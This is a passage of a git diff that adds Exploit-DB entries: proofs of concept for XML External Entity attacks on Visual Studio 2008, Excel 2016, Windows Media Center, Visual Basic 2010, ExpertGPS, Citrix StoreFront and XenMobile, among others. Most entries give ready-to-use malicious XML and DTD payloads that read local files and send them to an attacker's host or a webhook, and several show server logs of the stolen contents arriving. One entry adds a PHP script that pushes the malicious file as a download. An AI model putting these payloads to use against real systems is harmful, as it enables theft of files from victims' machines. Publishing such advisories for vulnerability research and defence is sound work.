+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.microsoft.com
+# Software Link: Visual Studio 2008 Express IDE 
+# Tested Version: 2008
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
+[+] ISR: ApparitionSec          
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Visual Studio 2008 Express IDE 
+vcsetup.exe
+File hash: 62f764849e8fcdf8bfbc342685641304
+Download: http://go.microsoft.com/?linkid=7729279
+
+
+[Vulnerability Type]
+XML External Entity Injection 0Day
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.
+By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the
+remote attackers server. 
+
+Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get 
+associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.
+
+[Vuln XXE file types]
+.snippet
+.i
+.s
+.asm
+.disco
+.lst
+.inc
+.srf
+.wsdl
+.rgs
+.xml
+
+This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.
+
+
+[References]
+https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/
+
+
+[Exploit/POC]
+"Evil.snippet" or any of the extensions mentioned above.
+
+<?xml version="1.0"?>
+<!DOCTYPE knobgobslob [ 
+<!ENTITY % file SYSTEM "C:\Windows\system.ini">
+<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+
+"payload.dtd"
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
+%all;
+
+
+python -m SimpleHTTPServer
+python -m http.server (Python3)
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=QOZlwzsbPrk
+
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification:  3/24/2017 
+MSRC sent me link to "Definition of a Security Vulnerability"
+Also Product is also not supported anymore.
+December 1, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/xml/local/47735.txt b/exploits/xml/local/47735.txt
new file mode 100644
index 000000000..422886185
--- /dev/null
+++ b/exploits/xml/local/47735.txt
@@ -0,0 +1,107 @@
+# Exploit Title: Microsoft Excel 2016 1901 - XML External Entity Injection
+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.microsoft.com
+# Tested Version: 2016 v1901
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
+[+] ISR: ApparitionSec          
+ 
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Excel 2016 v1901
+
+Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS.
+It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. 
+
+
+[CVE]
+N/A
+
+
+[Vulnerability Type]
+Error Import Based XML External Entity Injection
+
+
+[Security Issue]
+Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as
+Html page" functionality upon receiving errors importing a specially crafted XML file.
+
+This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability.
+
+Tested successfuly Windows 10 .NET framework version v4.0.30319.
+
+C:\>dir /b %windir%\Microsoft.NET\Framework\v*
+v4.0.30319
+
+
+[Exploit/POC]
+Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML'
+
+1) You will get error like: 
+
+"Error:
+
+Unable to connect
+
+We encountered an error while trying to connect.
+
+The user will then get an option to 'Edit' where they can import the file as an HTML file
+
+Result Local data can be exfiltrated to remote server"
+
+2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel
+
+User has choose to import as HTML then XXE attack will succeed:
+
+e.g.
+
+127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO
+/1.1" 200 -
+
+
+Malicious XML file to load as New Data Query
+
+"test.xml"
+
+<?xml version='1.0'?>
+<!DOCTYPE root [ 
+<!ENTITY % file SYSTEM 'C:\Windows\system.ini'>
+<!ENTITY % dtd SYSTEM 'http://127.0.0.1:8000/payload.dtd'>
+%dtd;]>
+<pwn>&send;</pwn>
+
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: May 10, 2019
+MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release.
+Engineering Team may or may not fix in a future version of the release."
+November 30, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/xml/local/47740.txt b/exploits/xml/local/47740.txt
new file mode 100644
index 000000000..2aeeeba69
--- /dev/null
+++ b/exploits/xml/local/47740.txt
@@ -0,0 +1,113 @@
+# Exploit Title: Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass
+# Discovery by: hyp3rlinx
+# Date: 2019-12-03
+# Vendor Homepage: www.microsoft.com
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
+[+] ISR: Apparition Security         
+ 
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft Windows Media Center
+
+Windows Media Center is a discontinued digital video recorder and media player created by Microsoft.
+Media Center was first introduced to Windows in 2002 on Windows XP Media Center.
+
+
+[Vulnerability Type]
+XML External Entity MotW Bypass (Anniversary Edition)
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed.
+Now, to make matters worse I will let you know "mark-of-the-web" MotW does not matter here, its just ignored.
+Meaning, if the .MCL file is internet downloaded it gets the MOTW but files still exfiltrated. 
+
+Therefore, I am releasing this "anniversary edition" XXE with important motw informations.
+
+This is a fully working remote information disclosure vulnerability that still affects Windows 7.
+Windows 7 is near end of life this January, yet it is still used by many organizations.
+Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center but I have not tested it.
+
+Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server Port 80 etc...
+Download the ".mcl" file using Microsoft Internet Explorer.
+
+Check the MotW where you downloaded the .mcl file dir /r and note the Zone.Identifier:$DATA exists.
+Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol.
+
+OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro
+
+
+[Exploit/POC]
+1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"
+
+# PoC
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE knobgobslob [
+<!ENTITY % data666 SYSTEM "c:\Windows\system.ini">
+<!ENTITY % junk SYSTEM "http://<TARGET-IP>/FindMeThatBiotch.dtd">
+%junk;
+%param666;
+%FindMeThatBiotch;
+]>
+
+
+2) "FindMeThatBiotch.dtd"
+<!ENTITY % param666 "<!ENTITY &#x25; FindMeThatBiotch SYSTEM 'http://<TARGET-IP>/%data666;'>">
+
+
+3) Auto exploit PHP .mcl file downloader.
+
+<?php
+$url = 'http://<ATTACKER-IP>/M$-Wmc-Anniversary-Motw-Bypass.mcl';
+header('Content-Type: application/octet-stream');
+header("Content-Transfer-Encoding: Binary"); 
+header("Content-disposition: attachment; filename=\"" . basename($url) . "\""); 
+readfile($url);
+?>
+
+
+4) python -m SimpleHTTPServer 80
+
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=zcrATpBNAZ0
+
+
+[Network Access]
+Remote
+
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification:  December 4, 2016
+MSRC "wont fix"
+Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/xml/local/47743.txt b/exploits/xml/local/47743.txt
new file mode 100644
index 000000000..bf47458f4
--- /dev/null
+++ b/exploits/xml/local/47743.txt
@@ -0,0 +1,96 @@
+# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
+# Exploit Author: ZwX
+# Exploit Date: 2019-12-03
+# Version Software : 10.0.30319.1 RTMRel
+# Vendor Homepage : https://www.microsoft.com/
+# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
+# Tested on OS: Windows 7
+
+
+[+] Exploit : (PoC)
+===================
+1) python -m SimpleHTTPServer 8000
+2) Create file (.xml)
+3) Create file Payload.dtd
+4) Open the software Microsoft Visual Basic 2010
+5) Drag the file (.xml) in a VB project
+6) External Entity Injection Successful
+
+
+[+] XXE.xml :
+==============
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "C:\Windows\win.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+[+] Payload.dtd :
+=================
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
+%all;
+
+
+[+] Result Exploitation :
+=========================
+C:\>python -m SimpleHTTPServer 8000
+Serving HTTP on 0.0.0.0 port 8000 ...
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
+
+
+Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt
+
+# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
+# Exploit Author: ZwX
+# Exploit Date: 2019-12-03
+# Version Software : 10.0.30319.1 RTMRel
+# Vendor Homepage : https://www.microsoft.com/
+# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
+# Tested on OS: Windows 7 
+
+
+[+] Exploit : (PoC)
+===================
+1) python -m SimpleHTTPServer 8000
+2) Create file (.xml)
+3) Create file Payload.dtd
+4) Open the software Microsoft Visual Basic 2010
+5) Drag the file (.xml) in a VB project
+6) External Entity Injection Successful
+
+
+[+] XXE.xml :
+==============
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "C:\Windows\win.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+[+] Payload.dtd :
+=================
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
+%all;
+
+
+[+] Result Exploitation :
+=========================
+C:\>python -m SimpleHTTPServer 8000
+Serving HTTP on 0.0.0.0 port 8000 ...
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
+ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
+%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
+Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
\ No newline at end of file
diff --git a/exploits/xml/local/47896.txt b/exploits/xml/local/47896.txt
new file mode 100644
index 000000000..9282521f0
--- /dev/null
+++ b/exploits/xml/local/47896.txt
@@ -0,0 +1,42 @@
+# Exploit Title: MSN Password Recovery 1.30 - XML External Entity Injection
+# Exploit Author: ZwX
+# Exploit Date: 2020-01-08
+# Vendor Homepage : https://www.top-password.com/
+# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
+# Tested on OS: Windows 10
+
+
+[+] Exploit : (PoC)
+===================
+1) python -m SimpleHTTPServer 8000
+2) Create file (.xml)
+3) Create file Payload.dtd
+4) Open the software MSN Password Recovery
+5) Click the 'Help' button and a 'Msn Password Recovery' window opens
+6) Click the 'Favorites' tab and add in Path Current the path of your file (.XML) Ex : file:///C:/Users/ZwX/Desktop/file.xml
+7) Click the 'View' button
+8) External Entity Injection Successful
+
+
+[+] XXE.xml :
+==============
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "C:\Windows\win.ini">
+<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+[+] Payload.dtd :
+=================
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
+%all;
+
+
+[+] Result Exploitation :
+=========================
+C:\>python -m SimpleHTTPServer 8000
+Serving HTTP on 0.0.0.0 port 8000 ...
+ZwX-PC - - [08/Jan/2020 20:32:36] "GET /payload.dtd HTTP/1.1" 200 -
+ZwX-PC - - [08/Jan/2020 20:32:37] "GET /?;%20for%2016-bit%20app%20support[fonts][extensions][mci%20extensions][files][Mail]MAPI=1 HTTP/1.1" 200 -
\ No newline at end of file
diff --git a/exploits/xml/local/47945.txt b/exploits/xml/local/47945.txt
new file mode 100644
index 000000000..5c948f80d
--- /dev/null
+++ b/exploits/xml/local/47945.txt
@@ -0,0 +1,61 @@
+# Exploit Title: Easy XML Editor 1.7.8 - XML External Entity Injection
+# Exploit Author: Javier Olmedo
+# Date: 2018-11-21
+# Vendor: Richard Wuerflein
+# Software Link: https://www.edit-xml.com/Easy_XML_Editor.exe
+# Affected Version: 1.7.8 and before
+# Patched Version: unpatched
+# Category: Local
+# Platform: XML
+# Tested on: Windows 10 Pro
+# CWE: https://cwe.mitre.org/data/definitions/611.html
+# CVE: 2019-19031
+# References:
+# https://hackpuntes.com/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/
+ 
+# 1. Technical Description
+# Easy XML Editor version 1.7.8 and before are affected by XML External Entity Injection vulnerability
+# through the malicious XML file. This allows a malicious user to read arbitrary files.
+ 
+# 2. Proof Of Concept (PoC)
+# 2.1 Start a webserver to receive the connection.
+
+python -m SimpleHTTPServer 80
+
+# 2.2 Upload the payload.dtd file to your web server.
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:80/?%file;'>">
+%all;
+
+# 2.3 Create a SECRET.TXT file with any content in desktop.
+
+# 2.4 Open poc.xml
+
+<?xml version="1.0"?>
+<!DOCTYPE test [
+<!ENTITY % file SYSTEM "file:///C:\Users\<USER>\Desktop\secret.txt">
+<!ENTITY % dtd SYSTEM "http://localhost:80/payload.dtd">
+%dtd;]>
+<pwn>&send;</pwn>
+
+# 2.5 Your web server will receive a request with the contents of the secret.txt file
+
+Serving HTTP on 0.0.0.0 port 8000 ...
+192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /payload.dtd HTTP/1.1" 200 -
+192.168.100.23 - - [11/Nov/2019 08:23:52] "GET /?THIS%20IS%20A%20SECRET%20FILE HTTP/1.1" 200 -
+
+# 3. Timeline
+# 13, november 2019 - [RESEARCHER] Discover
+# 13, november 2019 - [RESEARCHER] Report to vendor support
+# 14, november 2019 - [DEVELOPER]  Unrecognized vulnerability
+# 15, november 2019 - [RESEARCHER] Detailed vulnerability report
+# 22, november 2019 - [RESEARCHER] Public disclosure
+
+# 4. Disclaimer
+# The information contained in this notice is provided without any guarantee of use or otherwise.
+# The redistribution of this notice is explicitly permitted for insertion into vulnerability
+# databases, provided that it is not modified and due credit is granted to the author.
+# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
+# All content (c)
+# Javier Olmedo
\ No newline at end of file
diff --git a/exploits/xml/webapps/47561.txt b/exploits/xml/webapps/47561.txt
new file mode 100644
index 000000000..69bac20a5
--- /dev/null
+++ b/exploits/xml/webapps/47561.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection
+# Date: 2019-08-28
+# Exploit Author: Vahagn Vardanya
+# Vendor Homepage:https://www.citrix.com/downloads/storefront/
+# Software Link: https://support.citrix.com/article/CTX251988
+# Version:
+# Citrix StoreFront Server  earlier than 1903
+# Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000)
+# Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)#
+# Tested on: Windows
+# Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb
+
+# PoC
+
+POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1
+Content-Type: application/vnd.citrix.requesttoken+xml
+Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd.
+citrix.authenticateresponse-1+xml
+Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
+X-Forwarded-For: 192.168.204.1
+X-Citrix-Agent: crm.
+X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview
+X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image
+X-Citrix-IsUsingHTTPS: No
+Host: 192.168.204.131
+Content-Length: 331
+Expect: 100-continue
+
+<?xml version="1.0" encoding="utf-8" standalone='no'?><!DOCTYPE
+requesttoken [<!ENTITY % xxe SYSTEM "http://REMOTE">%xxe; ]><requesttoken
+xmlns="http://citrix.com/delivery-services/1-0/auth/requesttoken
+"><for-service>a</for-service><for-service-url>http://secure-web.cisco.com/
+<http://secure-web.cisco.com/1ijL9Cycthe9FsmytQkHCl1Xg9pMufEcuz0PmzFHVwkbFjSep42bW3GRBkLUxePJTdOcYeHl5hlVi95aQc-F0KUuqpBKFdx4EXJ_ppx3MY000cALA2hGugGjMX3hbmvhtPOTba7B4LnAcpuyFDLHiSlv8xyu_CzN0mhekRY51L34p4Wy9oMguR9Bj8YWAm6KxixMl1DiaZ88h4FVR0vKzHdtedNF63xO329dQAtQuVWiipK_rt4rnVWKmorTTrbp-bsdV7zUBsqjON-MZYpzagQ/http%3A%2F%2F192.168.204.146%2FCitrix%2Fstore_nameAuth%2Fauth%2Fv1%2Ftoken></for-service-url><reqtokentemplate
+/><requested-lifetime>0.08:00:00</requested-lifetime></requesttoken>
\ No newline at end of file
diff --git a/exploits/xml/webapps/47951.py b/exploits/xml/webapps/47951.py
new file mode 100755
index 000000000..b8b331b85
--- /dev/null
+++ b/exploits/xml/webapps/47951.py
@@ -0,0 +1,47 @@
+# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
+# Google Dork: inurl:zdm logon
+# Date: 2019-11-28
+# Exploit Author: Jonas Lejon
+# Vendor Homepage: https://www.citrix.com
+# Software Link:
+# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
+# Tested on: XenMobile
+# CVE : CVE-2018-10653
+
+#!/usr/bin/python3
+##
+## PoC exploit test for the security vulnerability CVE-2018-10653 in
+XenMobile Server 10.8 before RP2 and 10.7 before RP3
+##
+## This PoC was written by Jonas Lejon 2019-11-28
+<jonas.xenmobile@triop.se> https://triop.se
+## Reported to Citrix 2017-10, patch released 2018-05
+##
+
+import requests
+import sys
+from pprint import pprint
+import uuid
+
+# Surf to https://webhook.site and copy/paste the URL below. Used for
+XXE callback
+WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"
+
+id = str(uuid.uuid1())
+
+xml = '''<?xml version="1.0" encoding="UTF-8"
+standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' +
+WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''
+
+print(id)
+
+response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
+ headers=
+{'User-Agent': 'MDM/1.0',
+'Connection': 'close',
+'Content-Type': 'application/x-apple-aspen-mdm'},
+data=xml,stream=True
+)
+print(response.content)
+print(response.text)
+pprint(response)
\ No newline at end of file
diff --git a/exploits/xml/webapps/48026.txt b/exploits/xml/webapps/48026.txt
new file mode 100644
index 000000000..09ab29ba7
--- /dev/null
+++ b/exploits/xml/webapps/48026.txt
@@ -0,0 +1,97 @@
+[+] Exploit Title: ExpertGPS 6.38 - XML External Entity Injection
+[+] Date: 2019-12-07
+[+] Exploit Author: Trent Gordon
+[+] Vendor Homepage: https://www.topografix.com/
+[+] Software Link: http://download.expertgps.com/SetupExpertGPS.exe
+[+] Disclosed at: 7FEB2020
+[+] Version: 6.38
+[+] Tested on: Windows 10
+[+] CVE: N/A
+ 
+==================
+Background:
+==================
+ExpertGPS 6.38 is GPS software, distributed by TopoGrafix, that is designed to sync with commercial off-the-shelf GPS devices (Garmin, Magellin, etc.) and organize GPS waypoint data.  One of the main file formats for saving GPS data is the .gpx format which is based on XML. 
+ 
+==================
+Vulnerability:
+==================
+By having a user import a crafted .gpx file (XML Based GPS data file), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker.
+1.)Open ExpertGPS.exe
+2.)Select File -> Import Data from Other Programs...
+3.)Select the crafted route.gpx file (with listener open on ATTACKERS-IP) and click "Open".
+ 
+==================
+Proof of Concept:
+==================
+ 
+a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)
+ 
+b.) Hosted "payload.dtd"
+ 
+<?xml version="1.0" encoding="utf-8" ?>
+<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
+<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">
+ 
+ 
+c.) Exploited "route.xml"
+ 
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE data [
+<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/payload.dtd">
+%sp;
+%param1;
+%exfil;
+]>
+<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1" creator="ExpertGPS 6.38 using Garmin Colorado 400t" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wptx1="http://www.garmin.com/xmlschemas/WaypointExtension/v1" xmlns:gpxx="http://www.garmin.com/xmlschemas/GpxExtensions/v3" xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd http://www.topografix.com/GPX/gpx_overlay/0/3 http://www.topografix.com/GPX/gpx_overlay/0/3/gpx_overlay.xsd http://www.topografix.com/GPX/gpx_modified/0/1 http://www.topografix.com/GPX/gpx_modified/0/1/gpx_modified.xsd http://www.topografix.com/GPX/Private/TopoGrafix/0/4 http://www.topografix.com/GPX/Private/TopoGrafix/0/4/topografix.xsd http://www.garmin.com/xmlschemas/WaypointExtension/v1 http://www8.garmin.com/xmlschemas/WaypointExtensionv1.xsd http://www.garmin.com/xmlschemas/GpxExtensions/v3 http://www.garmin.com/xmlschemas/GpxExtensionsv3.xsd">
+<metadata>
+<bounds minlat="38.89767500" minlon="-77.03654700" maxlat="38.89767500" maxlon="-77.03654700"/>
+<extensions>
+<time xmlns="http://www.topografix.com/GPX/gpx_modified/0/1">2019-12-08T03:35:44.731Z</time>
+<active_point xmlns="http://www.topografix.com/GPX/Private/TopoGrafix/0/4" lat="38.89767500" lon="-77.03654700">
+</active_point>
+</extensions>
+</metadata>
+<wpt lat="38.89767500" lon="-77.03654700">
+<time>2019-12-08T03:35:44.732Z</time>
+<name>1600PennsylvaniaAvenuenWashingt</name>
+<cmt>1600 Pennsylvania Avenue
+Washington</cmt>
+<desc>1600 Pennsylvania Avenue
+Washington, DC 20500</desc>
+<sym>City (Small)</sym>
+<type>Address</type>
+<extensions>
+<label xmlns="http://www.topografix.com/GPX/gpx_overlay/0/3">
+<label_text>1600 Pennsylvania Avenue
+Washington, DC 20500</label_text>
+</label>
+<gpxx:WaypointExtension>
+<gpxx:Address>
+<gpxx:StreetAddress>1600 Pennsylvania Avenue</gpxx:StreetAddress>
+<gpxx:City>Washington</gpxx:City>
+<gpxx:State>DC</gpxx:State>
+<gpxx:Country>United States</gpxx:Country>
+<gpxx:PostalCode>20500</gpxx:PostalCode>
+</gpxx:Address>
+</gpxx:WaypointExtension>
+<wptx1:WaypointExtension>
+<wptx1:Address>
+<wptx1:StreetAddress>1600 Pennsylvania Avenue</wptx1:StreetAddress>
+<wptx1:City>Washington</wptx1:City>
+<wptx1:State>DC</wptx1:State>
+<wptx1:Country>United States</wptx1:Country>
+<wptx1:PostalCode>20500</wptx1:PostalCode>
+</wptx1:Address>
+</wptx1:WaypointExtension>
+</extensions>
+</wpt>
+<extensions>
+</extensions>
+</gpx>
+
+
+==================
+Additional Attack Vectors:
+==================
+There are numerous places in the software that allow for importing/opening a .gpx file.  I did not test them all, but I strongly suspect them to all rely upon the same misconfigured XML Parser, and therefore be vulnerable to XXE.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e6d0f9435..600baaeaa 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -4781,6 +4781,7 @@ id,file,description,date,author,type,platform,port
 38348,exploits/windows/dos/38348.txt,"Adobe Flash - 'uint' Capacity Field",2015-09-28,"Google Security Research",dos,windows,
 38364,exploits/multiple/dos/38364.txt,"Varnish Cache - Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,dos,multiple,
 38365,exploits/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Remote Denial of Service",2013-03-05,tytusromekiatomek,dos,linux,
+48262,exploits/windows/dos/48262.py,"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)",2020-03-30,"Ivan Marmolejo",dos,windows,
 38392,exploits/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",dos,linux,
 38399,exploits/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow (PoC)",2015-10-05,hyp3rlinx,dos,windows,
